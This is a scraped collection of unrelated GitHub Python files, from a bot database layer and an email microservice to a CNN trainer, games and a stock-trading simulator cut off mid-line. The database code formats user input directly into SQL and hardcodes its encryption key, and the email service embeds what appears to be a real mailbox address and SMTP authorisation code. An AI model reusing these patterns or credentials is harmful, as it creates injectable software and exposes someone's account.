\"`first_button` Text NULL,\"\n \"`secound_button` Text NULL,\"\n \"`title` Text NULL,\"\n \"`context` Text NULL,\"\n \"`price_ware` Text NULL,\"\n \"`currency_ware` Text NULL,\"\n \"`unit_ware` Text NULL,\"\n \"`discount` Text NULL,\"\n \"`photo_file` Text NULL,\"\n \"`file_id` Text NULL,\"\n \"`showindays` Text NULL,\"\n \"PRIMARY KEY(emp_nu));\")\n\n save_in_other_table = (\"SET block_encryption_mode = 'aes-256-cbc'; \"\n \"SET @key_str = SHA2('My secret passphrase',512);\"\n \"SET @init_vector = 'h>1&cr!a[v+qm&3b+F6*P~'; \"\n \"INSERT IGNORE INTO \"+create_table_seller+\"(\"\n \"first_button, secound_button, title, context, currency_ware, price_ware, unit_ware, discount, photo_file, file_id, showindays)\"\n \"VALUES(AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector));\")\n\n await cur.execute(create_other_table)\n await conn.commit()\n await cur.execute(save_in_other_table, table_seller)\n await conn.commit()\n\n elif flag_Update_Token == \"chang_token\":\n await cur.execute(update_token.format(Bot_id = kwargs[\"bot_id\"], Token = kwargs[\"new_token\"]))\n await conn.commit()\n\n elif flag_Update_Token == \"give_bot_id4ch_t\":\n give_bot_id = \"\"\"SET @ENCRYPT_User_id = '{User_id}'; \n select AES_DECRYPT(Bot_ID,@key_str, @init_vector) from Token_Takjoy where @ENCRYPT_User_id = AES_DECRYPT(User_id, @key_str, @init_vector);\"\"\"\n await cur.execute(pre_secure)\n await conn.commit()\n await cur.execute(give_bot_id.format(User_id = str(kwargs[\"user_id\"])))\n await conn.commit()\n result_bot_names = await cur.fetchall()\n return result_bot_names\n\n elif flag_Update_Token == \"charge_bot\":\n charge_bot_table = \"\"\"SET @ENCRYPT_Bot_id = '{Bot_id}';\n UPDATE Token_Takjoy SET `Bot_Date` = DATE_ADD(`Bot_Date` , INTERVAL {Daysetting} DAY)\n where Bot_id = AES_ENCRYPT(@ENCRYPT_Bot_id,@key_str, @init_vector)\"\"\"\n await cur.execute(pre_secure)\n await conn.commit()\n await cur.execute(charge_bot_table.format(Bot_id = kwargs[\"bot_id\"], Daysetting = str(kwargs[\"day\"])))\n await conn.commit()\n return\n\n elif flag_Update_Token == \"create_db4citypost\":\n table4citypost = \"post4city_\" + str(kwargs[\"table_name\"])\n createtable4citypost = (\"\"\"CREATE TABLE IF NOT EXISTS {table4citypost}(\n `citypost_no` int(12) NOT NULL AUTO_INCREMENT,\n `city_name` Text not NULL,\n `post_purchase` Text not NULL,\n PRIMARY KEY(citypost_no));\"\"\")\n save_in_citypost = (\"\"\"INSERT IGNORE INTO {table4citypost}(city_name, post_purchase)\n VALUES(AES_ENCRYPT('{city_name}',@key_str, @init_vector),\n AES_ENCRYPT('{post_purchase}',@key_str, @init_vector));\"\"\")\n await cur.execute(pre_secure)\n await conn.commit()\n await cur.execute(createtable4citypost.format(table4citypost = table4citypost))\n await conn.commit()\n await cur.execute(save_in_citypost.format(table4citypost = table4citypost, city_name = kwargs[\"city_name\"], post_purchase = kwargs[\"post_purchase\"]))\n await conn.commit()\n\n elif flag_Update_Token == \"db4citypost\":\n table4citypost = \"post4city_\" + str(kwargs[\"table_name\"])\n createtable4citypost = (\"\"\"CREATE TABLE IF NOT EXISTS 
{table4citypost}(\n `citypost_no` int(12) NOT NULL AUTO_INCREMENT,\n `city_name` Text not NULL,\n `post_purchase` Text not NULL,\n PRIMARY KEY(citypost_no));\"\"\")\n take_from_citypost = (\"\"\"select AES_DECRYPT(city_name,@key_str, @init_vector),\n AES_DECRYPT(post_purchase,@key_str, @init_vector)\n from {table4citypost};\"\"\")\n edit_citypost = (\"\"\"update {table4citypost} set `city_name` = AES_ENCRYPT('{city_name}',@key_str, @init_vector),\n `post_purchase` = AES_ENCRYPT('{city_name}',@key_str, @init_vector) where\n `city_name` = AES_ENCRYPT('{ex_city_name}',@key_str, @init_vector);\"\"\")\n delete_citypost = (\"\"\"DELETE FROM {table4citypost} where `city_name` = AES_ENCRYPT('{city_name}',@key_str, @init_vector);\"\"\")\n await cur.execute(pre_secure)\n await conn.commit()\n await cur.execute(createtable4citypost.format(table4citypost = table4citypost))\n await conn.commit() \n if kwargs['ctrl_account'] == \"take_from_citypost\":\n await cur.execute(take_from_citypost.format(table4citypost = table4citypost))\n await conn.commit()\n result_sellers = await cur.fetchall()\n return result_sellers \n elif kwargs['ctrl_account'] == \"edit_citypost\":\n await cur.execute(edit_citypost.format(table4citypost = table4citypost, city_name = kwargs[\"city_name\"], post_purchase = kwargs[\"purchaseofcity\"], ex_city_name = kwargs[\"ex_city_name\"]))\n await conn.commit()\n elif kwargs['ctrl_account'] == \"delete_citypost\":\n await cur.execute(delete_citypost.format(table4citypost = table4citypost, city_name = kwargs[\"city_name\"]))\n await conn.commit() \n\n elif flag_Update_Token ==\"account_db\":\n table4account = \"account_\" + str(kwargs[\"table_num\"])\n createtable4citypost = (\"\"\"CREATE TABLE IF NOT EXISTS {table4account}(\n `account_no` int(12) NOT NULL AUTO_INCREMENT,\n `account_num` Text not NULL,\n `account_name` Text not NULL,\n PRIMARY KEY(account_no));\"\"\")\n save_in_citypost = (\"\"\"INSERT IGNORE INTO {table4account}(account_num, account_name)\n VALUES(AES_ENCRYPT('{account_num}',@key_str, @init_vector),\n AES_ENCRYPT('{account_name}',@key_str, @init_vector));\"\"\")\n take_from_db = (\"\"\"select AES_DECRYPT(`account_num`,@key_str, @init_vector) from {table4account};\"\"\")\n take_all_from_db = (\"\"\"select AES_DECRYPT(`account_num`,@key_str, @init_vector), AES_DECRYPT(`account_name`,@key_str, @init_vector) from {table4account};\"\"\")\n Delete_from_db = (\"\"\"Delete from {table4account} where '{account_num}' = AES_DECRYPT(`account_num`,@key_str, @init_vector);\"\"\")\n await cur.execute(pre_secure)\n await conn.commit()\n await cur.execute(createtable4citypost.format(table4account = table4account))\n await conn.commit()\n result_db = await cur.fetchall()\n if kwargs['ctrl_account'] == \"save_in_db\":\n await cur.execute(save_in_citypost.format(table4account = table4account, account_num = kwargs[\"account_num\"], account_name = kwargs[\"account_name\"]))\n await conn.commit()\n elif kwargs['ctrl_account'] == \"take_from_db\":\n await cur.execute(take_from_db.format(table4account = table4account))\n await conn.commit()\n result_account = await cur.fetchall()\n Temp_account = []\n for accounts in result_account:\n Temp_account.append(accounts[0].decode('utf8'))\n return Temp_account\n elif kwargs['ctrl_account'] == \"Delete_from_db\":\n await cur.execute(Delete_from_db.format(table4account = table4account, account_num = kwargs[\"account_num\"]))\n await conn.commit()\n elif kwargs['ctrl_account'] == \"take_all_from_db\":\n await 
cur.execute(take_all_from_db.format(table4account = table4account))\n await conn.commit()\n result_all_account = await cur.fetchall()\n return result_all_account\n await cur.close()\n conn.close()\n","repo_name":"m2khosravizadeh/Ex_Takjoybot","sub_path":"first/db_takjoy.py","file_name":"db_takjoy.py","file_ext":"py","file_size_in_byte":19509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"24877854377","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nsys.path.append(\"/\")\nfrom message.api import MessageService\nfrom thrift.transport import TSocket\nfrom thrift.transport import TTransport\nfrom thrift.protocol import TBinaryProtocol\nfrom thrift.server import TServer\n\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.header import Header\n\n#发送email的邮箱和授权码\nsender = \"15604288825@163.com\"\nauthCode = \"xj199804025511hl\"\nclass MessageServiceHandler:\n    def sendMobileMessage(self, mobile, message):\n        print(\"sendMobileMessage,mobile:\"+mobile+\",message:\"+message)\n        return True\n\n    def sendEmailMessage(self, email, message):\n        print(\"sendEmailMessage,Email:\" + email + \",message:\" + message)\n        #create text\n        messageObj = MIMEText(message,\"plain\",\"utf-8\")\n        messageObj['From'] = sender\n        messageObj['To'] = email\n        messageObj['Subject'] = Header(\"徐俊的邮件\",\"utf-8\")\n\n        try:\n            smtpObj = smtplib.SMTP('smtp.163.com')\n            smtpObj.login(sender,authCode)\n            #send email\n            smtpObj.sendmail(sender,email,messageObj.as_string())\n        except smtplib.SMTPException as ex:\n            print(\"send email failed ...\")\n            print(ex)\n            return False\n\n        print(\"send email success ...\")\n        return True\n\nif __name__ == '__main__':\n    handler = MessageServiceHandler()\n    processor = MessageService.Processor(handler)\n    transport = TSocket.TServerSocket(None, \"9090\")\n    tfactory = TTransport.TFramedTransportFactory()\n    pfactory = TBinaryProtocol.TBinaryProtocolFactory()\n\n    server = TServer.TSimpleServer(processor, transport, tfactory, pfactory)\n    print (\"python thrift server start\")\n    server.serve()\n    print (\"python thrift server exit\")\n","repo_name":"xvjun/microservice","sub_path":"message-thrift-python-service/message/message_service.py","file_name":"message_service.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"72188258887","text":"\"\"\"\n @author: Austin Edwards\n\n View for displaying, adding, and removing ImageManagerFileTable data\n\n\"\"\"\n\nfrom PyQt5.QtWidgets import QMainWindow, QTableWidget, QHeaderView\n\nfrom views.image_manager_view_ui import Ui_ImageManagerMainWindow\nfrom controllers.image_manager_ctrl import ImageManagerController\nimport numpy as np\nimport pandas as pd\n\nclass ImageManagerView(QMainWindow):\n def __init__(self, model, main_controller):\n \n super().__init__()\n\n self._model = model\n self._main_controller = main_controller\n\n self._ui = Ui_ImageManagerMainWindow()\n self._ui.setupUi(self)\n self._ui.addImageButton.clicked.connect(self._main_controller.request_image_files)\n self._ui.removeImageButton.clicked.connect(self.remove_images)\n\n self._ui.imageManagerTableView.setSelectionBehavior(QTableWidget.SelectRows)\n self._ui.imageManagerTableView.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)\n \n self._ui.imageManagerTableView.setModel(self._model)\n\n def remove_images(self):\n \"\"\" Sends selected indexes to delete to file table model \"\"\"\n print(\"REMOVE\")\n self._model.delete_row(self._ui.imageManagerTableView.selectedIndexes())\n\n def closeEvent(self, event):\n \"\"\" Lets the controller know that the window has been closed so that the current image can be updated \"\"\"\n \n event.accept()\n \n if len(self._model._filelist) > 0:\n self._main_controller.file_manager_window_close()\n","repo_name":"awedwards/multiview-image-data-explorer","sub_path":"views/image_manager_view.py","file_name":"image_manager_view.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"30243575858","text":"from sys import stdin\n\ndef y(n):\n result = []\n for i in range(1, n+1):\n if n%i == 0:\n result.append(i)\n return result\n\ndef x(nlist: list, v:int):\n result = \"\"\n for i in nlist[:-1]:\n for j in nlist[1:]:\n if i+j == v:\n result = \"yes\"\n return result\n result = \"no\"\n return result\n\n\nT = int(input())\nfor i in range(T):\n A, B = map(int, stdin.readline().split())\n tmp = y(A)\n print(x(tmp, B))\n continue","repo_name":"taza0912/daily_coding","sub_path":"BOJ(Baekjoon_Online_Judge)/baekjoon_1402.py","file_name":"baekjoon_1402.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"42694284079","text":"#!/usr/bin/env python3\nimport click\nimport soco\n\n@click.command()\n@click.argument(\"sonos_ip\")\n@click.argument(\"stream_url\")\ndef cli(sonos_ip, stream_url):\n \"\"\"Plays the given STREAM_URL on the SONOS_IP device\"\"\"\n speaker = soco.SoCo(sonos_ip)\n speaker.clear_queue()\n speaker.add_uri_to_queue(stream_url)\n speaker.play_from_queue(0)\n\ndef main():\n cli(prog_name=\"sonos-play\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"denysvitali/sonos-live-stream","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"20764290424","text":"import scipy.io as sio\nimport numpy as np\nimport tensorflow as tf\nimport random\nfrom sklearn.preprocessing import *\nfrom time import *\nimport os\nimport matplotlib.pyplot as plt\nfrom pylab import *\nfrom sklearn.preprocessing import MinMaxScaler\nfrom PIL import Image\n\n###下面是讲解python怎么读取.mat文件以及怎么处理得到的结果###\nload_fn = 'F:/zhicheng/张森师兄训练数据/ToZZC/feature_10.mat'\nprint(load_fn)\nload_data = sio.loadmat(load_fn)\n# load_matrix = load_data['matrix']\n# 假设文件中存有字符变量是matrix,例如matlab中save(load_fn, 'matrix');\n# 当然可以保存多个save(load_fn, 'matrix_x', 'matrix_y', ...);\n# load_matrix_row = load_matrix[0]\n# 取了当时matlab中matrix的第一行,python中数组行排\n# print(np.split(load_data['feature.P']))\na = load_data['feature'][0]\na = a[0]\ntemp = a[1]\nyj = a[2]\nyj = yj[0]\n\nfwj = a[3]\nfwj = fwj[0]\n# print(\"方位角:\", fwj)\n\ninput_data = np.transpose(temp) # 整理输入\n# print(\"input_data\", input_data)\n# print(\"仰角\", yj)\n\ntrain_data = []\ntest_data = []\nfwjtrainlabel = []\nfwjtestlabel = []\nyjtrainlabel = []\nyjtestlabel = []\ntest_accuracy_list=[]\nCKPT_DIR = 'C:/Users/Administrator/Desktop/owndatatest1/'\n\nfilename = 'C:/Users/Administrator/Desktop/owndatatest2/'\nfilename2 = 'C:/Users/Administrator/Desktop/owndatatest3/'\nfor pic in os.listdir(filename):\n im = Image.open(filename + pic)\n im2 = np.array(im)\n train_data.append(im2)\ntrain_data = np.array(train_data)\n\n\nfor pic in os.listdir(filename2):\n im = Image.open(filename + pic)\n im2 = np.array(im)\n test_data.append(im2)\ntest_data = np.array(test_data)\n\nfor i in range(0, 3360):\n yjtrainlabel.append(yj[i])\nfor i in range(3360, 3840):\n yjtestlabel.append(yj[i]) # 整理标签\n\n\ndata1 = np.array(yjtrainlabel)\nvalues1 = data1\nlabel_encoder1 = LabelEncoder()\ninteger_encoded1 = label_encoder1.fit_transform(values1)\n# print(integer_encoded)\n\nonehot_encoder1 = OneHotEncoder(sparse=False)\ninteger_encoded1 = integer_encoded1.reshape(len(integer_encoded1), 1)\nonehot_encoded1 = onehot_encoder1.fit_transform(integer_encoded1)\nYtrain_onehot = np.array(onehot_encoded1)\n\nprint(\"Ytrain_onehot-----------------\", Ytrain_onehot)\n\n\ndata2 = yjtestlabel\nvalues2 = np.array(data2)\n# print(values)\n\nlabel_encoder2 = LabelEncoder()\ninteger_encoded2 = label_encoder2.fit_transform(values2)\n# print(integer_encoded)\n\nonehot_encoder2 = OneHotEncoder(sparse=False)\ninteger_encoded2 = integer_encoded2.reshape(len(integer_encoded2), 1)\nonehot_encoded2 = onehot_encoder2.fit_transform(integer_encoded2)\nprint(\"onehot_encoded2----------------\", onehot_encoded2)\n\n\n# 初始化过滤器\ndef weight_variable(shape):\n return tf.Variable(tf.truncated_normal(shape, stddev=0.1))\n\n\n# 初始化偏置,初始化时,所有值是0.1\ndef bias_variable(shape):\n return tf.Variable(tf.constant(0.1, shape=shape))\n\n\n# 卷积运算,strides表示每一维度滑动的步长,一般strides[0]=strides[3]=1\n# 第四个参数可选\"Same\"或\"VALID\",“Same”表示边距使用全0填充\ndef conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding=\"SAME\")\n\n\n# 池化运算\ndef max_pool_2x2(x):\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding=\"SAME\")\n\n\n# 创建x占位符,用于临时存放MNIST图片的数据,\n# [None, 784]中的None表示不限长度,而784则是一张图片的大小(28×28=784)\nx = tf.placeholder(tf.float32, [None, 28, 28])\n# y_存的是实际图像的标签,即对应于每张输入图片实际的值\ny_ = tf.placeholder(tf.float32, [None, 8])\n\n# 将图片从784维向量重新还原为28×28的矩阵图片,\n# 原因参考卷积神经网络模型图,最后一个参数代表深度,\n# 因为MNIST是黑白图片,所以深度为1,\n# 第一个参数为-1,表示一维的长度不限定,这样就可以灵活设置每个batch的训练的个数了\nx_image = tf.reshape(x, [-1, 28, 28, 1])\n\n# 第一层卷积\n# 将过滤器设置成5×5×1的矩阵,\n# 
其中5×5表示过滤器大小,1表示深度,因为MNIST是黑白图片只有一层。所以深度为1\n# 32表示卷积在经过每个5×5大小的过滤器后可以算出32个特征,即经过卷积运算后,输出深度为32\nW_conv1 = weight_variable([5, 5, 1, 32])\n# 有多少个输出通道数量就有多少个偏置\nb_conv1 = bias_variable([32])\n# 使用conv2d函数进行卷积计算,然后再用ReLU作为激活函数\nh_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)\n\nW_conv3 = weight_variable([5, 5, 32, 32])\n# 有多少个输出通道数量就有多少个偏置\nb_conv3 = bias_variable([32])\n# 使用conv2d函数进行卷积计算,然后再用ReLU作为激活函数\nh_conv3 = tf.nn.relu(conv2d(h_conv1, W_conv3) + b_conv3)\n\nW_conv5 = weight_variable([5, 5, 32, 32])\n# 有多少个输出通道数量就有多少个偏置\nb_conv5 = bias_variable([32])\n# 使用conv2d函数进行卷积计算,然后再用ReLU作为激活函数\nh_conv5 = tf.nn.relu(conv2d(h_conv3, W_conv5) + b_conv5)\n\n\nh_pool1=max_pool_2x2(h_conv5)\n# 卷积以后再经过池化操作\n#h_pool1 = max_pool_2x2(h_conv1)\n\n\n\n\n\n# 第二层卷积\n# 因为经过第一层卷积运算后,输出的深度为32,所以过滤器深度和下一层输出深度也做出改变\nW_conv2 = weight_variable([5, 5, 32, 64])\nb_conv2 = bias_variable([64])\nh_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)\n\nW_conv4 = weight_variable([5, 5, 64, 64])\nb_conv4 = bias_variable([64])\nh_conv4 = tf.nn.relu(conv2d(h_conv2, W_conv4) + b_conv4)\n\nh_pool2 = max_pool_2x2(h_conv4)\n\n# 全连接层\n# 经过两层卷积后,图片的大小为7×7(第一层池化后输出为(28/2)×(28/2),\n# 第二层池化后输出为(14/2)×(14/2)),深度为64,\n# 我们在这里加入一个有1024个神经元的全连接层,所以权重W的尺寸为[7 * 7 * 64, 1024]\nW_fc1 = weight_variable([7 * 7 * 64, 1024])\n# 偏置的个数和权重的个数一致\nb_fc1 = bias_variable([1024])\n# 这里将第二层池化后的张量(长:7 宽:7 深度:64) 变成向量(跟上一节的Softmax模型的输入一样了)\nh_pool2_flat = tf.reshape(h_pool2, [-1, 7 * 7 * 64])\n# 使用ReLU激活函数\nh_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\n\n# dropout\n# 为了减少过拟合,我们在输出层之前加入dropout\nkeep_prob = tf.placeholder(tf.float32)\nh_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n\n# 输出层\n# 全连接层输入的大小为1024,而我们要得到的结果的大小是10(0~9),\n# 所以这里权重W的尺寸为[1024, 10]\nW_fc2 = weight_variable([1024, 8])\nb_fc2 = bias_variable([8])\n# 最后都要经过Softmax函数将输出转化为概率问题\ny_conv = tf.nn.softmax(tf.matmul(h_fc1_drop, W_fc2) + b_fc2)\n\n# 损失函数和损失优化\n#cross_entropy = tf.reduce_sum(y_ * tf.log(y_conv))\n# coss_entropy=tf.losses.sparse_softmax_cross_entropy(labels=y_,logits=y_conv)\ncross_entropy = tf.reduce_mean (\n tf.nn.softmax_cross_entropy_with_logits (labels = y_, logits = y_conv))#损失函数,交叉熵方法\n# train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\ntrain_step= tf.train.GradientDescentOptimizer(0.001).minimize(cross_entropy)\n\n# 测试准确率,跟Softmax回归模型的一样\ncorrect_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n\n# 开始训练\nwith tf.Session() as sess:\n # 初始化所有变量\n sess.run(tf.global_variables_initializer())\n saver=tf.train.Saver(max_to_keep=3)\n # 训练两万次\n for i in range(20000):\n # # 每次获取50张图片数据和对应的标签\n # batch1 = train_data.next_batch(50)\n # batch2=test_data.next_batch(50)\n # # 每训练100次,我们打印一次训练的准确\n train_accuracy = sess.run(accuracy, feed_dict={x: train_data, y_: Ytrain_onehot, keep_prob: 0.5})\n print(\"step %d, training accuracy %g\" % (i, train_accuracy))\n sess.run(train_step, feed_dict={x: train_data, y_: Ytrain_onehot, keep_prob: 0.5})# 这里是真的训练,将数据传入\n #train_step.run(feed_dict={x: train_data, y_: Ytrain_onehot, keep_prob: 0.5})\n test_accuracy = sess.run(accuracy, feed_dict={x: test_data, y_: onehot_encoded2, keep_prob: 1.0})\n test_accuracy_list.append(test_accuracy)\n if i%5000 == 0:\n saver.save(sess, CKPT_DIR+'model.ckpt',global_step=i)\n if i % 100 == 0:\n 
print(test_accuracy)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"kdzhangzhicheng/cnntrainowndata","sub_path":"cnnyj.py","file_name":"cnnyj.py","file_ext":"py","file_size_in_byte":8532,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"73588458889","text":"from constants import *\r\nfrom board_and_rules import Board, GameRules, PlayGame\r\nfrom mcts import Node, MCTS\r\n\r\nclass PlayVsAI(PlayGame, MCTS):\r\n\r\n def __init__(self):\r\n super().__init__()\r\n\r\n def play_vs_mcts(self, num_iters, num_sims=1, hide_evaluations=True):\r\n while self.is_terminal(self.game) == \"-\":\r\n move = self.input_move(\"x\")\r\n self.make_move_(self.game, move)\r\n self.print_board()\r\n\r\n if self.is_terminal(self.game) != \"-\":\r\n break\r\n\r\n move = self.search(self.game, move, num_iters, num_sims, hide_evaluations=hide_evaluations)\r\n print(move_keys_inv[move[0]])\r\n self.make_move_(self.game, move)\r\n self.print_board()\r\n print(self.is_terminal(self.game), \"wins!\")\r\n\r\nif __name__ == '__main__':\r\n run = PlayVsAI()\r\n run.play_vs_mcts(10000)\r\n ","repo_name":"BevandaIvan/uttt-mcts","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"128197331","text":"# Solved on 2021.01.04\n# 2667 단지번호붙이기 ver.BFS\n\n# ---------------------------\n\nfrom collections import deque\nimport sys\ninput = sys.stdin.readline\n\n\ndef bfs(board, x, y, visited):\n global count\n\n queue = deque()\n queue.append((x, y))\n\n visited[x][y] = True\n count += 1\n\n dx = [-1, 1, 0, 0]\n dy = [0, 0, -1, 1]\n\n while queue:\n a, b = queue.popleft()\n for i in range(4):\n nx = a + dx[i]\n ny = b + dy[i]\n\n if nx < 0 or ny < 0 or nx >= n or ny >= n:\n continue\n elif not visited[nx][ny] and board[nx][ny] == 1:\n queue.append((nx, ny))\n visited[nx][ny] = True\n count += 1\n\n\nn = int(input())\nboard = []\nvisited = [[False] * n for _ in range(n)]\ncount = 0\nnum = 0\nc = []\n\n\nfor _ in range(n):\n board.append(list(map(int, input().rstrip())))\n\nfor i in range(n):\n for j in range(n):\n if board[i][j] == 1 and not visited[i][j]:\n bfs(board, i, j, visited)\n c.append(count)\n count = 0\n num += 1\n\nprint(num)\nc.sort()\nfor i in c:\n print(i)\n","repo_name":"gemstoneyang/Algorithm","sub_path":"BOJ/DFS_and_BFS/2667_2.py","file_name":"2667_2.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"9829919055","text":"import pygame\nfrom pygame.locals import DOUBLEBUF, QUIT, KEYUP, K_ESCAPE\nimport sys\n\npygame.init()\n\n# 디스플레이 초기화\nDISPLAYSURF = pygame.display.set_mode((640, 480), DOUBLEBUF)\npygame.display.set_caption(\"등축 투영\")\n\n\n# 맵 데이터: (1) 벽, (0) 바닥\nmap_data = [\n [1, 1, 1, 1, 1],\n [1, 0, 0, 0, 1],\n [1, 0, 0, 0, 1],\n [1, 0, 0, 0, 1],\n [1, 0, 0, 0, 1],\n [1, 1, 0, 0, 1],\n [1, 1, 0, 0, 1],\n [1, 1, 1, 1, 1],\n]\n\n# 타일 이미지 로드\nwall = pygame.image.load(\"map_tset01.png\").convert_alpha()\ngrass = pygame.image.load(\"map_test02.png\").convert_alpha()\nTILEWIDTH = 64 # 타일 너비\nTILEHEIGHT = 64 # 타일 높이\nTILEHEIGHT_HALF = TILEHEIGHT / 2\nTILEWIDTH_HALF = TILEWIDTH / 2\n\n# 타일 배치\nfor row_nb, row in enumerate(map_data):\n for col_nb, tile in enumerate(row):\n if tile == 1:\n tileImage = wall\n else:\n tileImage = grass\n cart_x = row_nb * TILEWIDTH_HALF\n cart_y = col_nb * TILEHEIGHT_HALF\n iso_x = cart_x - cart_y\n iso_y = (cart_x + cart_y) / 2\n centered_x = DISPLAYSURF.get_rect().centerx + iso_x\n centered_y = DISPLAYSURF.get_rect().centery / 2 + iso_y\n DISPLAYSURF.blit(tileImage, (centered_x, centered_y))\n\n# 게임 실행\nFPSCLOCK = pygame.time.Clock()\nwhile True:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n if event.type == KEYUP:\n if event.key == K_ESCAPE:\n pygame.quit()\n sys.exit()\n\n pygame.display.flip()\n FPSCLOCK.tick(30)","repo_name":"kywon22/2DGP-project_2021184019","sub_path":"dummy/past/map_state.py","file_name":"map_state.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"12662499811","text":"import pandas as pd\nimport numpy as np\nfrom portfolio import *\nfrom get_data import *\nfrom utils import *\nimport copy\n#from matplotlib import pyplot as plt\n#import seaborn\n\n#housekeeping\nconfig = Config()\ntransaction_fee = config.get_generic_config_property('portfolio','transaction_fee')\nmax_holdings = config.get_generic_config_property('portfolio','max_holdings')\n\n#beginning = datetime.datetime.strptime(config.get_generic_config_property('stocks','start_date'), '%Y-%m-%d').date()\n#finish = datetime.datetime.strptime(config.get_generic_config_property('stocks','end_date'), '%Y-%m-%d').date()\n\nportfolio = Portfolio()\nraw_market_data = GetStocks()\nraw_market_data = raw_market_data.stock_data.dropna()\n\n#time window has to reflect number of trading days, should be number of rows in the raw market data - 1\ntime_window = raw_market_data.shape[0] - 1 #114 #(finish - beginning).days - 5 #days\ntoday = raw_market_data.iloc[2].name.strftime('%Y-%m-%d')\n\n\n\ndef assess_buy_and_hold(portfolio_dict: dict(), raw_market_data: pd.DataFrame()) -> dict():\n buy_and_hold_keys = list(portfolio_dict.keys())\n buy_and_hold_keys.remove('cash')\n final_close = raw_market_data.Close[buy_and_hold_keys].iloc[-1].to_dict()\n portfolio_dict_buy_and_hold_final = portfolio_dict.copy()\n for k, v in portfolio_dict_buy_and_hold_final.items():\n if k == 'cash':\n pass\n else:\n portfolio_dict_buy_and_hold_final[k]['current_price'] = final_close[k]\n return portfolio_dict_buy_and_hold_final\n\n\ndef run_trading_simulation (period, portfolio_dict, date, raw_market_data):\n print(f'here is the initial dict: {portfolio_dict}')\n days_remaining = period\n sell_side_complete = False\n updated_portfolio = portfolio_dict.copy()\n today_index = 2\n day_before_yesterday_index = today_index - 2\n\n while days_remaining > 0:\n print(f'analyzing stocks, {days_remaining} days left to analyze')\n market_data = raw_market_data.iloc[day_before_yesterday_index:today_index] #subset the raw market data to a df of three rows, current, previous, previous - 1\n updated_portfolio = run_trading_day(sell_side_complete, updated_portfolio, date, market_data)\n days_remaining -= 1\n today_index += 1 #must advance the date\n day_before_yesterday_index = today_index - 2\n print(f'here is the updated dict {updated_portfolio}')\n print(\"total value of current portfolio is: \" + total_value(updated_portfolio).astype('str'))\n #update the market price of the holdings in the dictionary here\n return updated_portfolio\n\ndef run_trading_day (sell_side_complete, portfolio_dict, date, market_data):\n print(sell_side_complete)\n # if sell_side_complete == False:\n # print('im buying!')\n # updated_portfolio = run_buy_side(portfolio_dict, date, market_data, portfolio.threshold)\n # else:\n print('im selling!')\n # sell_side_complete, updated_portfolio = run_sell_side(portfolio_dict, date, market_data)\n \n sell_side_complete, updated_portfolio = run_sell_side(portfolio_dict, date, market_data)\n\n print('im buying!')\n updated_portfolio = run_buy_side(portfolio_dict, date, market_data, portfolio.threshold)\n return updated_portfolio\n\ndef run_buy_side (portfolio_dict, date, market_data, threshold):\n ls_to_buy = portfolio.candidates_for_purchase(market_data, threshold) #based on overall candidates recent performance, what if security is already in portfolio? 
